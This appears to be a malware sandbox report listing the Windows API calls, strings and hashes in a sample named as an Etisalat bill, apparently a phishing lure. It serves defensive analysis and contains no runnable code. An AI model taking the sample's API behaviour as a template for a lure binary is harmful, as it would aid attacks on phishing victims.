                                      • Instruction Fuzzy Hash: 68F01D3224119ABFE7215BA29C4DEBB7B7CEBC6B11F000169FA04D60909AA15A01C6B5
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,?), ref: 00BC74E5
                                      • EnterCriticalSection.KERNEL32(?,?,00B71044,?,?), ref: 00BC74F6
                                      • TerminateThread.KERNEL32(00000000,000001F6,?,00B71044,?,?), ref: 00BC7503
                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00B71044,?,?), ref: 00BC7510
                                        • Part of subcall function 00BC6ED7: CloseHandle.KERNEL32(00000000,?,00BC751D,?,00B71044,?,?), ref: 00BC6EE1
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00BC7523
                                      • LeaveCriticalSection.KERNEL32(?,?,00B71044,?,?), ref: 00BC752A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 3495660284-0
                                      • Opcode ID: ece0abc9d5076527f5e017c69ebb17c5be8e62e60c8cc18f63aa15a3b0060cf2
                                      • Instruction ID: 4e73b27feea59ca946f43f6f502f8c5077a5d69b47852c0a1cfff35707345568
                                      • Opcode Fuzzy Hash: ece0abc9d5076527f5e017c69ebb17c5be8e62e60c8cc18f63aa15a3b0060cf2
                                      • Instruction Fuzzy Hash: C3F03A7A540653ABDB111B64EC88EEA776AEF45302B010676F202AA0A0CF755901CE50
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BB8E7F
                                      • UnloadUserProfile.USERENV(?,?), ref: 00BB8E8B
                                      • CloseHandle.KERNEL32(?), ref: 00BB8E94
                                      • CloseHandle.KERNEL32(?), ref: 00BB8E9C
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00BB8EA5
                                      • HeapFree.KERNEL32(00000000), ref: 00BB8EAC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                      • String ID:
                                      • API String ID: 146765662-0
                                      • Opcode ID: 5eaf8d75dc6ab09933cae5eff90e8343fe9d2540d494cc3a80425b7c4365ecb2
                                      • Instruction ID: f6fd12ffc186eaa15f6b8c2027e0b52fd0ad2bce3a2ff5b253f6161f32ce6770
                                      • Opcode Fuzzy Hash: 5eaf8d75dc6ab09933cae5eff90e8343fe9d2540d494cc3a80425b7c4365ecb2
                                      • Instruction Fuzzy Hash: 17E0C236004046FBDA011FE1EC4C92ABB69FB89322B108230F2299A0B0CF329460DB51
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00BD8928
                                      • CharUpperBuffW.USER32(?,?), ref: 00BD8A37
                                      • VariantClear.OLEAUT32(?), ref: 00BD8BAF
                                        • Part of subcall function 00BC7804: VariantInit.OLEAUT32(00000000), ref: 00BC7844
                                        • Part of subcall function 00BC7804: VariantCopy.OLEAUT32(00000000,?), ref: 00BC784D
                                        • Part of subcall function 00BC7804: VariantClear.OLEAUT32(00000000), ref: 00BC7859
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                      • API String ID: 4237274167-1221869570
                                      • Opcode ID: bfdeae472d2fa0ccc98701d834536a5d9a83070c6dab9b500ca13f02152a365f
                                      • Instruction ID: 7ae30c02de839d82717979760378b92252d3c1b4d9d502ef4beb182d45bb2213
                                      • Opcode Fuzzy Hash: bfdeae472d2fa0ccc98701d834536a5d9a83070c6dab9b500ca13f02152a365f
                                      • Instruction Fuzzy Hash: 97917E716083019FC710EF24C48496AFBF4EF89715F0489AEF89A8B361EB31E945CB52
                                      APIs
                                        • Part of subcall function 00B7FEC6: _wcscpy.LIBCMT ref: 00B7FEE9
                                      • _memset.LIBCMT ref: 00BC3077
                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BC30A6
                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BC3159
                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00BC3187
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                      • String ID: 0
                                      • API String ID: 4152858687-4108050209
                                      • Opcode ID: 154be3dea8e8555cbbda46bf710876d613a7a6c12e40fb89a3b1717e2bb63e70
                                      • Instruction ID: 6738cf3574e17069b120661b21f2f2b835a9da7b74c29883e35409afc5c2fa44
                                      • Opcode Fuzzy Hash: 154be3dea8e8555cbbda46bf710876d613a7a6c12e40fb89a3b1717e2bb63e70
                                      • Instruction Fuzzy Hash: 1351E0716083019FD725AF28D885F6BB7E4EF44B20F4889ADF895E31A0DB70CA44C792
                                      APIs
                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00BBDAC5
                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00BBDAFB
                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00BBDB0C
                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00BBDB8E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                      • String ID: DllGetClassObject
                                      • API String ID: 753597075-1075368562
                                      • Opcode ID: 5886a6607bce397c1d76e292265cb7ac2d3c974f64e314c591eab16a5988c499
                                      • Instruction ID: ddc3af1bab9d8fe104e3585adcd18c1bd285709edd6139fbdb5d5bf5b6b401ff
                                      • Opcode Fuzzy Hash: 5886a6607bce397c1d76e292265cb7ac2d3c974f64e314c591eab16a5988c499
                                      • Instruction Fuzzy Hash: 4A4151B1600609EFDB15CF54C884AEA7BE9EF48350F1580EDAD099F205E7F9D944DBA0
                                      APIs
                                      • _memset.LIBCMT ref: 00BC2CAF
                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00BC2CCB
                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00BC2D11
                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C26890,00000000), ref: 00BC2D5A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$InfoItem_memset
                                      • String ID: 0
                                      • API String ID: 1173514356-4108050209
                                      • Opcode ID: 572fd957bbf2cb74aac8a8553cbfac1b6bdf32f5b204266db4188fd28f22c00d
                                      • Instruction ID: 0c314eafb6410cddaa61eb0154db76af2615b963bc1820bb449b13b15b08c36b
                                      • Opcode Fuzzy Hash: 572fd957bbf2cb74aac8a8553cbfac1b6bdf32f5b204266db4188fd28f22c00d
                                      • Instruction Fuzzy Hash: 5E4193702043429FD724DF28C885F6BB7E8EF95320F1446ADF96697291DB70E905CBA2
                                      APIs
                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00BDDAD9
                                        • Part of subcall function 00B679AB: _memmove.LIBCMT ref: 00B679F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: BuffCharLower_memmove
                                      • String ID: cdecl$none$stdcall$winapi
                                      • API String ID: 3425801089-567219261
                                      • Opcode ID: bf5e4badff82a78990a6c72a5b359a98f1e3a619066897df2e0f606cef2348c7
                                      • Instruction ID: c78bfd99ab281706c640730e82cc162a3a160869a94c5cab0fb754149e887d0f
                                      • Opcode Fuzzy Hash: bf5e4badff82a78990a6c72a5b359a98f1e3a619066897df2e0f606cef2348c7
                                      • Instruction Fuzzy Hash: 7E31527160061AAFCF10EF54C8919EEF7F5FF05314B1086AAE8A597791DB71A905CB80
                                      APIs
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                        • Part of subcall function 00BBB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00BBB0E7
                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00BB93F6
                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00BB9409
                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00BB9439
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$_memmove$ClassName
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 365058703-1403004172
                                      • Opcode ID: 0ec39dc21e9cb5a2b70e105d16494d51d1bc93b580d3a2cdf37a30c1ec8c9ab8
                                      • Instruction ID: 887a69c8a1d452492de824f170c4deb28698bb7975a138475dbd7baa57996915
                                      • Opcode Fuzzy Hash: 0ec39dc21e9cb5a2b70e105d16494d51d1bc93b580d3a2cdf37a30c1ec8c9ab8
                                      • Instruction Fuzzy Hash: 8521E471940104BFDB24ABB4CC85CFFB7E8DF05350B1042A9FA25972E1DFB94A0A9620
                                      APIs
                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BD1B40
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BD1B66
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00BD1B96
                                      • InternetCloseHandle.WININET(00000000), ref: 00BD1BDD
                                        • Part of subcall function 00BD2777: GetLastError.KERNEL32(?,?,00BD1B0B,00000000,00000000,00000001), ref: 00BD278C
                                        • Part of subcall function 00BD2777: SetEvent.KERNEL32(?,?,00BD1B0B,00000000,00000000,00000001), ref: 00BD27A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                      • String ID:
                                      • API String ID: 3113390036-3916222277
                                      • Opcode ID: d5823d5ef1212ae7277d6d21645cd589b0e8350e472862b6481416dd1128618a
                                      • Instruction ID: 1cad1aa046f0f84eaf2e4c1930b5759d7f63c9166d440ef33fefb0e460b01579
                                      • Opcode Fuzzy Hash: d5823d5ef1212ae7277d6d21645cd589b0e8350e472862b6481416dd1128618a
                                      • Instruction Fuzzy Hash: 32219FB5600208BFEB219F689CC5EBFB6EDEB89B44F1045ABF505A7340FA309D059761
                                      APIs
                                        • Part of subcall function 00B61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B61D73
                                        • Part of subcall function 00B61D35: GetStockObject.GDI32(00000011), ref: 00B61D87
                                        • Part of subcall function 00B61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B61D91
                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00BE66D0
                                      • LoadLibraryW.KERNEL32(?), ref: 00BE66D7
                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00BE66EC
                                      • DestroyWindow.USER32(?), ref: 00BE66F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                      • String ID: SysAnimate32
                                      • API String ID: 4146253029-1011021900
                                      • Opcode ID: 9a15b692c189e036768ac5421e21410b4082a3abe0e2f44be4a5bd2e215b088c
                                      • Instruction ID: 9649418b26e146585cc5d68c9113d10586557b42bbb10b6d6ba37ab85898b832
                                      • Opcode Fuzzy Hash: 9a15b692c189e036768ac5421e21410b4082a3abe0e2f44be4a5bd2e215b088c
                                      • Instruction Fuzzy Hash: EC21BB71210286AFEF104F66EC80EBB37EDEB693A8F100669F91196190C771CC41A760
                                      APIs
                                      • GetStdHandle.KERNEL32(0000000C), ref: 00BC705E
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BC7091
                                      • GetStdHandle.KERNEL32(0000000C), ref: 00BC70A3
                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00BC70DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      • Opcode ID: 9cb8bdc16d57321d8a846e90e4c5c023447d731580eeafc252ed94f25a6cbf1d
                                      • Instruction ID: 55a45d4840a2bd151dabaf9caba301b020bc06baa8b5d84f3f19b577cec96e7e
                                      • Opcode Fuzzy Hash: 9cb8bdc16d57321d8a846e90e4c5c023447d731580eeafc252ed94f25a6cbf1d
                                      • Instruction Fuzzy Hash: 65214F7454420AABDB209F69D845F9A77E8EF44720F20465DFDA1D72D0DF7098508F51
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00BC712B
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BC715D
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00BC716E
                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00BC71A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00BCAEBF
                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00BCAF13
                                      • __swprintf.LIBCMT ref: 00BCAF2C
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,00BEF910), ref: 00BCAF6A
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume__swprintf
                                      • String ID: %lu
                                      • API String ID: 3164766367-685833217
                                      APIs
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                        • Part of subcall function 00BBA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00BBA399
                                        • Part of subcall function 00BBA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BBA3AC
                                        • Part of subcall function 00BBA37C: GetCurrentThreadId.KERNEL32 ref: 00BBA3B3
                                        • Part of subcall function 00BBA37C: AttachThreadInput.USER32(00000000), ref: 00BBA3BA
                                      • GetFocus.USER32 ref: 00BBA554
                                        • Part of subcall function 00BBA3C5: GetParent.USER32(?), ref: 00BBA3D3
                                      • GetClassNameW.USER32(?,?,00000100), ref: 00BBA59D
                                      • EnumChildWindows.USER32(?,00BBA615), ref: 00BBA5C5
                                      • __swprintf.LIBCMT ref: 00BBA5DF
                                      Similarity
                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                      • String ID: %s%d
                                      • API String ID: 1941087503-1110647743
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 00BC2048
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                      • API String ID: 3964851224-769500911
                                      APIs
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00BDEF1B
                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00BDEF4B
                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00BDF07E
                                      • CloseHandle.KERNEL32(?), ref: 00BDF0FF
                                      Similarity
                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                      • String ID:
                                      • API String ID: 2364364464-0
                                      APIs
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                        • Part of subcall function 00BE10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BE0038,?,?), ref: 00BE10BC
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BE0388
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BE03C7
                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00BE040E
                                      • RegCloseKey.ADVAPI32(?,?), ref: 00BE043A
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00BE0447
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                      • String ID:
                                      • API String ID: 3440857362-0
                                      APIs
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00BDDC3B
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00BDDCBE
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00BDDCDA
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00BDDD1B
                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00BDDD35
                                        • Part of subcall function 00B65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00BC7B20,?,?,00000000), ref: 00B65B8C
                                        • Part of subcall function 00B65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00BC7B20,?,?,00000000,?,?), ref: 00B65BB0
                                      Similarity
                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                      • String ID:
                                      • API String ID: 327935632-0
                                      APIs
                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00BCE88A
                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00BCE8B3
                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00BCE8F2
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00BCE917
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00BCE91F
                                      Similarity
                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                      • String ID:
                                      • API String ID: 1389676194-0
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00B62357
                                      • ScreenToClient.USER32(00C267B0,?), ref: 00B62374
                                      • GetAsyncKeyState.USER32(00000001), ref: 00B62399
                                      • GetAsyncKeyState.USER32(00000002), ref: 00B623A7
                                      Similarity
                                      • API ID: AsyncState$ClientCursorScreen
                                      • String ID:
                                      • API String ID: 4210589936-0
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BB695D
                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00BB69A9
                                      • TranslateMessage.USER32(?), ref: 00BB69D2
                                      • DispatchMessageW.USER32(?), ref: 00BB69DC
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BB69EB
                                      Similarity
                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                      • String ID:
                                      • API String ID: 2108273632-0
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00BB8F12
                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00BB8FBC
                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00BB8FC4
                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00BB8FD2
                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00BB8FDA
                                      Similarity
                                      • API ID: MessagePostSleep$RectWindow
                                      • String ID:
                                      • API String ID: 3382505437-0
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 00BBB6C7
                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00BBB6E4
                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00BBB71C
                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00BBB742
                                      • _wcsstr.LIBCMT ref: 00BBB74C
                                      Similarity
                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                      • String ID:
                                      • API String ID: 3902887630-0
                                      APIs
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BB9802
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BB9834
                                      • __itow.LIBCMT ref: 00BB984C
                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BB9874
                                      • __itow.LIBCMT ref: 00BB9885
